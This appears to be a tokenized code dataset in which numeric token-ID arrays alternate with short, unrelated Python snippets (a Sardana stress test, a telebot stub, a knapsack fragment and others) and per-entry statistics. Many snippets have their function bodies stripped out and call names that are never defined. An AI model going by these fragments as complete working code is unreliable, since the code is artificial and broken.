37227, 198, 220, 220, 220, 220, 220, 220, 220, 479, 86, 22046, 796, 1391, 6, 404, 62, 10354, 14680, 13, 39494, 9936, 11, 705, 4906, 62, 10354, 537, 82, 13, 834, 35827, 62, 4906, 834, 92, 198, 220, 220, 220, 220, 220, 220, 220, 9877, 796, 10104, 13, 12683, 1300, 7, 29289, 62, 26801, 13, 834, 15003, 834, 8, 198, 220, 220, 220, 220, 220, 220, 220, 329, 5772, 287, 9877, 13, 17143, 7307, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 30751, 796, 651, 35226, 7, 565, 82, 11, 277, 6, 834, 90, 17143, 92, 62, 48610, 834, 3256, 37456, 26181, 25, 651, 35226, 7, 26801, 11, 5772, 4008, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 479, 86, 22046, 58, 17143, 60, 796, 30751, 7, 29289, 62, 26801, 8, 628, 220, 220, 220, 220, 220, 220, 220, 1441, 537, 82, 7, 1174, 46265, 22046, 8, 628, 220, 220, 220, 2488, 12102, 1352, 10786, 4906, 62, 11537, 198, 220, 220, 220, 825, 2198, 62, 29289, 62, 4906, 7, 565, 82, 11, 7679, 62, 4906, 25, 34398, 6030, 8, 4613, 34398, 6030, 25, 220, 1303, 645, 20402, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 47719, 7679, 2099, 1988, 2810, 318, 262, 976, 355, 262, 2672, 1988, 13, 198, 220, 220, 220, 220, 220, 220, 220, 770, 318, 284, 7716, 4938, 1352, 329, 2198, 1058, 8189, 25, 63, 29289, 62, 4906, 63, 2214, 286, 850, 37724, 286, 1058, 4871, 25, 63, 17633, 49925, 44646, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 611, 7679, 62, 4906, 14512, 537, 82, 13, 834, 35827, 62, 4906, 834, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 5298, 11052, 12331, 7, 69, 6, 3109, 7254, 1391, 565, 82, 13, 834, 35827, 62, 4906, 834, 92, 475, 1392, 1391, 29289, 62, 4906, 92, 11537, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 7679, 62, 4906, 628, 628, 628, 628, 628, 628, 628, 628, 198, 198, 62, 49925, 6030, 796, 4479, 58, 14993, 451, 11, 34872, 16, 67, 11, 34872, 17, 67, 11, 797, 41596, 11, 11818, 71, 11, 347, 963, 35393, 16, 67, 11, 347, 963, 35393, 17, 67, 11, 5436, 27201, 16, 67, 11, 5436, 27201, 17, 67, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 30019, 425, 48997, 27201, 16, 67, 11, 30019, 425, 48997, 27201, 17, 67, 60, 628, 198, 4871, 32522, 7, 14881, 17633, 2599, 198, 220, 220, 220, 1303, 645, 1040, 14978, 9485, 3118, 411, 5634, 19927, 198, 220, 220, 220, 37227, 198, 220, 220, 220, 1423, 5344, 257, 10373, 2746, 4645, 1262, 257, 4823, 1366, 4645, 13, 198, 220, 220, 220, 1058, 35226, 25, 63, 29289, 63, 318, 262, 4823, 10139, 11, 10200, 257, 7679, 286, 262, 2746, 13, 1058, 35226, 25, 63, 38659, 63, 318, 262, 4823, 5743, 11, 198, 220, 220, 220, 10200, 543, 734, 11685, 389, 5884, 11, 290, 262, 11678, 286, 11192, 273, 1208, 13, 628, 220, 220, 220, 49213, 25, 198, 220, 220, 220, 220, 220, 220, 220, 7679, 357, 35422, 1068, 35, 713, 58, 2536, 11, 4808, 49925, 6030, 60, 2599, 34398, 16855, 11, 262, 1994, 318, 7679, 1438, 11, 290, 262, 1988, 318, 7679, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 12608, 13, 4091, 1058, 4871, 25, 63, 17633, 49925, 63, 329, 4941, 13, 198, 220, 220, 220, 220, 220, 220, 220, 4637, 357, 30719, 58, 35, 713, 58, 2536, 11, 360, 713, 58, 2536, 11, 14680, 11907, 60, 2599, 383, 4637, 357, 25, 35226, 25, 63, 38659, 63, 8, 8739, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 262, 3599, 7679, 1438, 11, 284, 262, 7464, 7679, 1438, 351, 257, 4637, 4905, 13, 628, 220, 220, 220, 21066, 3712, 628, 220, 220, 220, 220, 220, 220, 220, 13163, 422, 17268, 1330, 14230, 1068, 35, 713, 198, 220, 220, 220, 220, 220, 220, 220, 13163, 1303, 751, 257, 299, 77, 13, 14993, 451, 7679, 3706, 705, 16072, 16, 6, 351, 287, 62, 40890, 28, 35500, 11, 503, 62, 40890, 28, 940, 198, 220, 220, 220, 220, 220, 220, 220, 13163, 7679, 62, 76, 5912, 796, 14230, 1068, 35, 713, 15090, 198, 220, 220, 220, 220, 220, 220, 220, 2644, 220, 220, 220, 220, 705, 16072, 16, 10354, 44800, 49925, 7, 259, 62, 40890, 28, 35500, 11, 503, 62, 40890, 28, 940, 11, 2099, 62, 28, 49925, 6030, 13, 24027, 1503, 11, 1034, 62, 28, 32180, 13, 29266, 828, 198, 220, 220, 220, 220, 220, 220, 220, 2644, 32092, 198, 220, 220, 220, 220, 220, 220, 220, 13163, 1303, 4637, 1672, 329, 751, 4637, 422, 705, 42946, 16, 6, 284, 705, 16072, 16, 6, 198, 220, 220, 220, 220, 220, 220, 220, 13163, 4637, 62, 76, 5912, 796, 1391, 6, 42946, 16, 10354, 1391, 6, 16072, 16, 10354, 14680, 13, 29266, 11709, 198, 220, 220, 220, 220, 220, 220, 220, 13163, 2878, 796, 32522, 7, 29289, 28, 29289, 62, 76, 5912, 11, 4637, 28, 38659, 62, 76, 5912, 8, 198, 220, 220, 220, 220, 220, 220, 220, 13163, 3601, 7, 7249, 8, 198, 220, 220, 220, 220, 220, 220, 220, 7679, 34758, 6, 16072, 16, 10354, 44800, 49925, 7, 259, 62, 40890, 28, 35500, 11, 503, 62, 40890, 28, 940, 11, 10690, 28, 14202, 38165, 198, 220, 220, 220, 220, 220, 220, 220, 4637, 34758, 6, 42946, 16, 10354, 1391, 6, 16072, 16, 10354, 1279, 32180, 13, 29266, 25, 705, 32, 44167, 11709, 198, 220, 220, 220, 220, 220, 220, 220, 13163, 1303, 3819, 621, 1262, 262, 2746, 2134, 11, 356, 460, 1208, 287, 257, 8631, 22155, 11, 198, 220, 220, 220, 220, 220, 220, 220, 2644, 1303, 290, 17624, 4600, 1273, 5620, 13, 29572, 62, 26801, 44646, 198, 220, 220, 220, 220, 220, 220, 220, 13163, 4645, 62, 7890, 796, 1391, 198, 220, 220, 220, 220, 220, 220, 220, 2644, 220, 220, 220, 220, 705, 29289, 10354, 1391, 6, 16072, 10354, 1391, 6, 259, 62, 40890, 10354, 28119, 11, 705, 448, 62, 40890, 10354, 838, 11, 705, 4906, 62, 10354, 705, 13165, 354, 13, 20471, 13, 14993, 451, 3256, 705, 404, 62, 10354, 705, 32, 6, 92, 5512, 198, 220, 220, 220, 220, 220, 220, 220, 2644, 220, 220, 220, 220, 705, 38659, 10354, 1391, 6, 42946, 16, 10354, 1391, 6, 16072, 16, 10354, 705, 32, 6, 11709, 198, 220, 220, 220, 220, 220, 220, 220, 2644, 1782, 198, 220, 220, 220, 220, 220, 220, 220, 13163, 32522, 13, 29572, 62, 26801, 7, 301, 5620, 62, 7890, 8, 198, 220, 220, 220, 220, 220, 220, 220, 32522, 7, 29289, 34758, 6, 16072, 10354, 44800, 49925, 7, 259, 62, 40890, 28, 35500, 11, 503, 62, 40890, 28, 940, 11, 10690, 28, 14202, 8, 5512, 198, 220, 220, 220, 220, 220, 220, 220, 4637, 34758, 6, 42946, 16, 10354, 1391, 6, 16072, 16, 10354, 1279, 32180, 13, 29266, 25, 705, 32, 44167, 11709, 8, 628, 220, 220, 220, 37227, 198, 220, 220, 220, 7679, 25, 14230, 1068, 35, 713, 58, 2536, 11, 4808, 49925, 6030, 60, 796, 7663, 7, 198, 220, 220, 220, 220, 220, 220, 220, 4277, 62, 69, 9548, 28, 35422, 1068, 35, 713, 11, 198, 220, 220, 220, 220, 220, 220, 220, 1672, 34758, 6, 16072, 10354, 1391, 6, 448, 62, 40890, 10354, 838, 11, 705, 4906, 62, 10354, 705, 13165, 354, 13, 20471, 13, 14993, 451, 3256, 705, 404, 62, 10354, 705, 44, 6, 11709, 198, 220, 220, 220, 1267, 198, 220, 220, 220, 4637, 25, 32233, 58, 35, 713, 58, 2536, 11, 360, 713, 58, 2536, 11, 14680, 11907, 60, 796, 7663, 7, 198, 220, 220, 220, 220, 220, 220, 220, 4277, 62, 69, 9548, 28, 11600, 11, 198, 220, 220, 220, 220, 220, 220, 220, 1672, 34758, 6, 42946, 16, 10354, 1391, 6, 16072, 16, 10354, 705, 32, 6, 11709, 198, 220, 220, 220, 1267, 198 ]
2.520668
2,516
# coding=utf8 import socket from selectors2 import DefaultSelector, EVENT_READ, EVENT_WRITE import time url = 'xkcd.com' selector = DefaultSelector() stopped = False res = [] @log_time loop()
[ 2, 19617, 28, 40477, 23, 198, 11748, 17802, 198, 6738, 2922, 669, 17, 1330, 15161, 17563, 273, 11, 49261, 62, 15675, 11, 49261, 62, 18564, 12709, 198, 11748, 640, 198, 198, 6371, 796, 705, 87, 74, 10210, 13, 785, 6, 198, 198, 19738, 273, 796, 15161, 17563, 273, 3419, 198, 301, 38333, 796, 10352, 198, 411, 796, 17635, 628, 198, 31, 6404, 62, 2435, 198, 198, 26268, 3419, 198 ]
2.855072
69
from .tidy_verbs import * # noqa from .. import _get_all_imports __all__ = _get_all_imports(globals())
[ 6738, 764, 83, 19325, 62, 46211, 1330, 1635, 220, 220, 220, 220, 220, 220, 1303, 645, 20402, 198, 6738, 11485, 1330, 4808, 1136, 62, 439, 62, 320, 3742, 628, 198, 834, 439, 834, 796, 4808, 1136, 62, 439, 62, 320, 3742, 7, 4743, 672, 874, 28955, 198 ]
2.361702
47
import math time_first = int(input()) time_second = int(input()) time_third = int(input()) time_total = time_first + time_second + time_third minutes = time_total / 60 seconds = time_total % 60 minutes = math.floor(minutes) if seconds < 10: print(f"{minutes}:0{seconds}") else: print(f"{minutes}:{seconds}")
[ 11748, 10688, 198, 198, 2435, 62, 11085, 796, 493, 7, 15414, 28955, 198, 2435, 62, 12227, 796, 493, 7, 15414, 28955, 198, 2435, 62, 17089, 796, 493, 7, 15414, 28955, 198, 198, 2435, 62, 23350, 796, 640, 62, 11085, 1343, 640, 62, 12227, 1343, 640, 62, 17089, 198, 198, 1084, 1769, 796, 640, 62, 23350, 1220, 3126, 198, 43012, 796, 640, 62, 23350, 4064, 3126, 198, 198, 1084, 1769, 796, 10688, 13, 28300, 7, 1084, 1769, 8, 198, 198, 361, 4201, 1279, 838, 25, 198, 220, 220, 220, 3601, 7, 69, 1, 90, 1084, 1769, 38362, 15, 90, 43012, 92, 4943, 198, 198, 17772, 25, 198, 220, 220, 220, 3601, 7, 69, 1, 90, 1084, 1769, 92, 29164, 43012, 92, 4943 ]
2.652893
121
""" Problem below is i did not know what is the return, return list of items or return maximum def knapsack(items, cur_items_index, capacity, weights, profits, cur_items, cur_profit, cur_weight, max_items, max_profit): if (cur_items_index > len(items)-1) or \ cur_weight < capacity: return """ print(knapsack([2, 3, 1, 4], [4, 5, 3, 7], 5)) print(knapsack_memo([2, 3, 1, 4], [4, 5, 3, 7], 5)) print(knapsack([2, 3, 1, 4, 8], [4, 5, 3, 7, 15], 5)) print(knapsack_memo([2, 3, 1, 4, 8], [4, 5, 3, 7, 15], 5))
[ 198, 37811, 198, 40781, 2174, 318, 1312, 750, 407, 760, 644, 318, 262, 1441, 11, 220, 198, 197, 7783, 1351, 286, 3709, 220, 393, 1441, 5415, 220, 198, 4299, 638, 1686, 441, 7, 23814, 11, 198, 197, 197, 197, 1090, 62, 23814, 62, 9630, 11, 198, 197, 197, 197, 5339, 11, 198, 197, 197, 197, 19590, 11, 198, 197, 197, 197, 10177, 11, 198, 197, 197, 197, 1090, 62, 23814, 11, 198, 197, 197, 197, 1090, 62, 9183, 11, 198, 197, 197, 197, 1090, 62, 6551, 11, 198, 197, 197, 197, 3509, 62, 23814, 11, 198, 197, 197, 197, 3509, 62, 9183, 2599, 628, 197, 361, 357, 22019, 62, 23814, 62, 9630, 1875, 18896, 7, 23814, 13219, 16, 8, 393, 3467, 198, 197, 197, 22019, 62, 6551, 1279, 5339, 25, 198, 197, 197, 7783, 220, 198, 197, 198, 37811, 628, 628, 628, 198, 4798, 7, 15418, 1686, 441, 26933, 17, 11, 513, 11, 352, 11, 604, 4357, 685, 19, 11, 642, 11, 513, 11, 767, 4357, 642, 4008, 198, 4798, 7, 15418, 1686, 441, 62, 11883, 78, 26933, 17, 11, 513, 11, 352, 11, 604, 4357, 685, 19, 11, 642, 11, 513, 11, 767, 4357, 642, 4008, 198, 198, 4798, 7, 15418, 1686, 441, 26933, 17, 11, 513, 11, 352, 11, 604, 11, 807, 4357, 685, 19, 11, 642, 11, 513, 11, 767, 11, 1315, 4357, 642, 4008, 198, 4798, 7, 15418, 1686, 441, 62, 11883, 78, 26933, 17, 11, 513, 11, 352, 11, 604, 11, 807, 4357, 685, 19, 11, 642, 11, 513, 11, 767, 11, 1315, 4357, 642, 4008, 198 ]
2.148855
262
print("rl init")
[ 4798, 7203, 45895, 2315, 4943, 201, 198 ]
2.571429
7
import logging from lxml import etree from zeep import Plugin from aeat import utils, xml_signing logger = logging.getLogger(__name__) class RawXMLPlugin(object): ''' Stores last request and response as str '''
[ 11748, 18931, 198, 198, 6738, 300, 19875, 1330, 2123, 631, 198, 6738, 41271, 538, 1330, 42636, 198, 198, 6738, 257, 4098, 1330, 3384, 4487, 11, 35555, 62, 12683, 278, 198, 198, 6404, 1362, 796, 18931, 13, 1136, 11187, 1362, 7, 834, 3672, 834, 8, 628, 198, 198, 4871, 16089, 55, 5805, 37233, 7, 15252, 2599, 198, 220, 220, 220, 705, 7061, 198, 220, 220, 220, 41835, 938, 2581, 290, 2882, 355, 965, 198, 220, 220, 220, 705, 7061, 198 ]
2.898734
79
from aiogram import types from data import config from loader import dp from utils.misc import rate_limit @rate_limit(5, 'help') @dp.message_handler(commands=['help'])
[ 6738, 257, 72, 21857, 1330, 3858, 198, 6738, 1366, 1330, 4566, 198, 6738, 40213, 1330, 288, 79, 198, 6738, 3384, 4487, 13, 44374, 1330, 2494, 62, 32374, 628, 198, 31, 4873, 62, 32374, 7, 20, 11, 705, 16794, 11537, 198, 31, 26059, 13, 20500, 62, 30281, 7, 9503, 1746, 28, 17816, 16794, 6, 12962, 628 ]
3.109091
55
# projecteuler.net/problem=5 if __name__ == '__main__': main()
[ 2, 1628, 68, 18173, 13, 3262, 14, 45573, 28, 20, 201, 198, 201, 198, 361, 11593, 3672, 834, 6624, 705, 834, 12417, 834, 10354, 201, 198, 220, 220, 220, 1388, 3419, 201, 198 ]
2.181818
33
#!/usr/bin/env python ############################################################################## ## # This file is part of Sardana ## # http://www.sardana-controls.org/ ## # Copyright 2011 CELLS / ALBA Synchrotron, Bellaterra, Spain ## # Sardana is free software: you can redistribute it and/or modify # it under the terms of the GNU Lesser General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. ## # Sardana is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Lesser General Public License for more details. ## # You should have received a copy of the GNU Lesser General Public License # along with Sardana. If not, see <http://www.gnu.org/licenses/>. ## ############################################################################## import os import uuid from unittest import TestCase from tango import DevState from taurus import Device from taurus.test.base import insertTest from .test_pool import is_numerical from sardana.pool.pooldefs import AcqSynchType from sardana.taurus.core.tango.sardana.pool import registerExtensions from sardana.tango.pool.test.base_sartest import SarTestTestCase @insertTest(helper_name="stress_count", test_method_doc="stress count with CT (hardware trigger) and 0D", elements=["_test_ct_1_1", "_test_0d_1_1"], repeats=100, synchronizer="_test_tg_1_1", synchronization=AcqSynchType.Trigger) @insertTest(helper_name="stress_count", test_method_doc="stress count with CT (software trigger) and 0D", elements=["_test_ct_1_1", "_test_0d_1_1"], repeats=100, synchronizer="software", synchronization=AcqSynchType.Trigger) @insertTest(helper_name="stress_count", test_method_doc="stress count with CT (hardware start)", elements=["_test_ct_1_1"], repeats=100, synchronizer="_test_tg_1_1", synchronization=AcqSynchType.Start) @insertTest(helper_name="stress_count", test_method_doc="stress count with CT (software start)", elements=["_test_ct_1_1"], repeats=100, synchronizer="software", synchronization=AcqSynchType.Start) @insertTest(helper_name="stress_count", test_method_doc="stress count with CT (hardware trigger)", elements=["_test_ct_1_1"], repeats=100, synchronizer="_test_tg_1_1", synchronization=AcqSynchType.Trigger) @insertTest(helper_name="stress_count", test_method_doc="count with CT (software trigger)", elements=["_test_ct_1_1"], repeats=100, synchronizer="software", synchronization=AcqSynchType.Trigger)
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 198, 29113, 29113, 7804, 4242, 2235, 198, 2235, 198, 2, 770, 2393, 318, 636, 286, 46997, 2271, 198, 2235, 198, 2, 2638, 1378, 2503, 13, 82, 446, 2271, 12, 13716, 82, 13, 2398, 14, 198, 2235, 198, 2, 15069, 2813, 18671, 3069, 50, 1220, 8355, 4339, 16065, 354, 10599, 1313, 11, 7459, 729, 430, 11, 8602, 198, 2235, 198, 2, 46997, 2271, 318, 1479, 3788, 25, 345, 460, 17678, 4163, 340, 290, 14, 273, 13096, 198, 2, 340, 739, 262, 2846, 286, 262, 22961, 12892, 263, 3611, 5094, 13789, 355, 3199, 416, 198, 2, 262, 3232, 10442, 5693, 11, 2035, 2196, 513, 286, 262, 13789, 11, 393, 198, 2, 357, 265, 534, 3038, 8, 597, 1568, 2196, 13, 198, 2235, 198, 2, 46997, 2271, 318, 9387, 287, 262, 2911, 326, 340, 481, 307, 4465, 11, 198, 2, 475, 42881, 15529, 34764, 56, 26, 1231, 772, 262, 17142, 18215, 286, 198, 2, 34482, 3398, 1565, 5603, 25382, 393, 376, 46144, 7473, 317, 16652, 2149, 37232, 33079, 48933, 13, 220, 4091, 262, 198, 2, 22961, 12892, 263, 3611, 5094, 13789, 329, 517, 3307, 13, 198, 2235, 198, 2, 921, 815, 423, 2722, 257, 4866, 286, 262, 22961, 12892, 263, 3611, 5094, 13789, 198, 2, 1863, 351, 46997, 2271, 13, 220, 1002, 407, 11, 766, 1279, 4023, 1378, 2503, 13, 41791, 13, 2398, 14, 677, 4541, 15913, 13, 198, 2235, 198, 29113, 29113, 7804, 4242, 2235, 198, 198, 11748, 28686, 198, 11748, 334, 27112, 198, 6738, 555, 715, 395, 1330, 6208, 20448, 198, 198, 6738, 13875, 78, 1330, 6245, 9012, 198, 6738, 256, 22302, 1330, 16232, 198, 6738, 256, 22302, 13, 9288, 13, 8692, 1330, 7550, 14402, 198, 198, 6738, 764, 9288, 62, 7742, 1330, 318, 62, 77, 6975, 605, 198, 6738, 264, 446, 2271, 13, 7742, 13, 7501, 727, 891, 82, 1330, 4013, 80, 29934, 354, 6030, 198, 6738, 264, 446, 2271, 13, 83, 22302, 13, 7295, 13, 83, 14208, 13, 82, 446, 2271, 13, 7742, 1330, 7881, 11627, 5736, 198, 6738, 264, 446, 2271, 13, 83, 14208, 13, 7742, 13, 9288, 13, 8692, 62, 82, 433, 395, 1330, 6866, 14402, 14402, 20448, 628, 198, 31, 28463, 14402, 7, 2978, 525, 62, 3672, 2625, 41494, 62, 9127, 1600, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1332, 62, 24396, 62, 15390, 2625, 41494, 954, 351, 16356, 357, 10424, 1574, 7616, 8, 290, 657, 35, 1600, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 4847, 28, 14692, 62, 9288, 62, 310, 62, 16, 62, 16, 1600, 45434, 9288, 62, 15, 67, 62, 16, 62, 16, 33116, 29819, 28, 3064, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 18305, 7509, 2625, 62, 9288, 62, 25297, 62, 16, 62, 16, 1600, 42133, 28, 12832, 80, 29934, 354, 6030, 13, 48344, 8, 198, 31, 28463, 14402, 7, 2978, 525, 62, 3672, 2625, 41494, 62, 9127, 1600, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1332, 62, 24396, 62, 15390, 2625, 41494, 954, 351, 16356, 357, 43776, 7616, 8, 290, 657, 35, 1600, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 4847, 28, 14692, 62, 9288, 62, 310, 62, 16, 62, 16, 1600, 45434, 9288, 62, 15, 67, 62, 16, 62, 16, 33116, 29819, 28, 3064, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 18305, 7509, 2625, 43776, 1600, 42133, 28, 12832, 80, 29934, 354, 6030, 13, 48344, 8, 198, 31, 28463, 14402, 7, 2978, 525, 62, 3672, 2625, 41494, 62, 9127, 1600, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1332, 62, 24396, 62, 15390, 2625, 41494, 954, 351, 16356, 357, 10424, 1574, 923, 42501, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 4847, 28, 14692, 62, 9288, 62, 310, 62, 16, 62, 16, 33116, 29819, 28, 3064, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 18305, 7509, 2625, 62, 9288, 62, 25297, 62, 16, 62, 16, 1600, 42133, 28, 12832, 80, 29934, 354, 6030, 13, 10434, 8, 198, 31, 28463, 14402, 7, 2978, 525, 62, 3672, 2625, 41494, 62, 9127, 1600, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1332, 62, 24396, 62, 15390, 2625, 41494, 954, 351, 16356, 357, 43776, 923, 42501, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 4847, 28, 14692, 62, 9288, 62, 310, 62, 16, 62, 16, 33116, 29819, 28, 3064, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 18305, 7509, 2625, 43776, 1600, 42133, 28, 12832, 80, 29934, 354, 6030, 13, 10434, 8, 198, 31, 28463, 14402, 7, 2978, 525, 62, 3672, 2625, 41494, 62, 9127, 1600, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1332, 62, 24396, 62, 15390, 2625, 41494, 954, 351, 16356, 357, 10424, 1574, 7616, 42501, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 4847, 28, 14692, 62, 9288, 62, 310, 62, 16, 62, 16, 33116, 29819, 28, 3064, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 18305, 7509, 2625, 62, 9288, 62, 25297, 62, 16, 62, 16, 1600, 42133, 28, 12832, 80, 29934, 354, 6030, 13, 48344, 8, 198, 31, 28463, 14402, 7, 2978, 525, 62, 3672, 2625, 41494, 62, 9127, 1600, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1332, 62, 24396, 62, 15390, 2625, 9127, 351, 16356, 357, 43776, 7616, 42501, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 4847, 28, 14692, 62, 9288, 62, 310, 62, 16, 62, 16, 33116, 29819, 28, 3064, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 18305, 7509, 2625, 43776, 1600, 42133, 28, 12832, 80, 29934, 354, 6030, 13, 48344, 8, 198 ]
2.852492
983
import config import telebot bot = telebot.TeleBot(config.BOT_TOKEN) @bot.message_handler(commands=['start']) @bot.message_handler(content_types=["text"]) if __name__ == '__main__': bot.polling(none_stop=True)
[ 11748, 4566, 198, 11748, 5735, 13645, 628, 198, 13645, 796, 5735, 13645, 13, 31709, 20630, 7, 11250, 13, 33, 2394, 62, 10468, 43959, 8, 628, 198, 31, 13645, 13, 20500, 62, 30281, 7, 9503, 1746, 28, 17816, 9688, 6, 12962, 628, 198, 31, 13645, 13, 20500, 62, 30281, 7, 11299, 62, 19199, 28, 14692, 5239, 8973, 8, 198, 198, 361, 11593, 3672, 834, 6624, 705, 834, 12417, 834, 10354, 198, 220, 220, 220, 10214, 13, 30393, 278, 7, 23108, 62, 11338, 28, 17821, 8 ]
2.619048
84
#!/usr/bin/python2 # -*- coding: utf-8 -*- ##################################################################### # This program is free software. It comes without any warranty, to # # the extent permitted by applicable law. You can redistribute it # # and/or modify it under the terms of the Do What The Fuck You Want # # To Public License, Version 2, as published by Sam Hocevar. See # # http://sam.zoy.org/wtfpl/COPYING for more details. # ##################################################################### # A single simulation to run. from agent import UAgent from object import UObject from universe import Universe alice = UAgent( name='Alice', can_do=['take', 'ask_if', 'ask_ref'], goals= [ (('know', 'Alice', ('location', 'pipo', 'Alice')),), ], knowledge=[], max_length_plan = 3 ) bob = UAgent( name='Bob', can_do=['move', 'inform_if', 'inform_ref'], goals=[], knowledge= [ ('know', 'Bob', ('location', 'pipo', 0)) ] ) pipo = UObject('pipo') uni = Universe(3) uni.add(alice, 0) uni.add(bob, 2) uni.add(pipo, 0) print(uni) finished = False i = 0 nb_iteration_max = 5 while not finished and i < nb_iteration_max: print 'Itération %d' % i uni.step() i += 1 finished = uni.all_satisfied if i == nb_iteration_max: print 'Maximum number of iterations reached.'
[ 2, 48443, 14629, 14, 8800, 14, 29412, 17, 198, 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 198, 29113, 29113, 4242, 2, 198, 2, 770, 1430, 318, 1479, 3788, 13, 632, 2058, 1231, 597, 18215, 11, 284, 220, 1303, 198, 2, 262, 6287, 10431, 416, 9723, 1099, 13, 921, 460, 17678, 4163, 340, 220, 220, 1303, 198, 2, 290, 14, 273, 13096, 340, 739, 262, 2846, 286, 262, 2141, 1867, 383, 25617, 921, 16168, 1303, 198, 2, 1675, 5094, 13789, 11, 10628, 362, 11, 355, 3199, 416, 3409, 9544, 344, 7785, 13, 4091, 220, 220, 220, 1303, 198, 2, 2638, 1378, 37687, 13, 89, 726, 13, 2398, 14, 86, 27110, 489, 14, 34, 3185, 45761, 329, 517, 3307, 13, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 198, 29113, 29113, 4242, 2, 198, 198, 2, 317, 2060, 18640, 284, 1057, 13, 198, 198, 6738, 5797, 1330, 471, 36772, 198, 6738, 2134, 1330, 471, 10267, 198, 6738, 6881, 1330, 11950, 198, 198, 282, 501, 796, 471, 36772, 7, 1438, 11639, 44484, 3256, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 460, 62, 4598, 28, 17816, 20657, 3256, 705, 2093, 62, 361, 3256, 705, 2093, 62, 5420, 6, 4357, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 4661, 28, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 685, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 357, 10786, 16275, 3256, 705, 44484, 3256, 19203, 24886, 3256, 705, 79, 541, 78, 3256, 705, 44484, 11537, 828, 828, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 16589, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 3725, 41888, 4357, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 3509, 62, 13664, 62, 11578, 796, 513, 198, 220, 220, 220, 220, 220, 220, 220, 1267, 198, 198, 65, 672, 796, 471, 36772, 7, 1438, 11639, 18861, 3256, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 460, 62, 4598, 28, 17816, 21084, 3256, 705, 259, 687, 62, 361, 3256, 705, 259, 687, 62, 5420, 6, 4357, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 4661, 41888, 4357, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 3725, 28, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 685, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 19203, 16275, 3256, 705, 18861, 3256, 19203, 24886, 3256, 705, 79, 541, 78, 3256, 657, 4008, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2361, 198, 220, 220, 220, 220, 220, 1267, 198, 198, 79, 541, 78, 796, 471, 10267, 10786, 79, 541, 78, 11537, 198, 198, 35657, 796, 11950, 7, 18, 8, 198, 35657, 13, 2860, 7, 282, 501, 11, 657, 8, 198, 35657, 13, 2860, 7, 65, 672, 11, 362, 8, 198, 35657, 13, 2860, 7, 79, 541, 78, 11, 657, 8, 198, 198, 4798, 7, 35657, 8, 198, 198, 43952, 796, 10352, 198, 72, 796, 657, 198, 46803, 62, 2676, 341, 62, 9806, 796, 642, 198, 198, 4514, 407, 5201, 290, 1312, 1279, 299, 65, 62, 2676, 341, 62, 9806, 25, 198, 220, 220, 220, 3601, 705, 1026, 2634, 1358, 4064, 67, 6, 4064, 1312, 198, 220, 220, 220, 555, 72, 13, 9662, 3419, 198, 220, 220, 220, 1312, 15853, 352, 198, 220, 220, 220, 5201, 796, 555, 72, 13, 439, 62, 82, 17403, 798, 198, 198, 361, 1312, 6624, 299, 65, 62, 2676, 341, 62, 9806, 25, 198, 220, 220, 220, 3601, 705, 40541, 1271, 286, 34820, 4251, 2637, 198 ]
2.284226
672
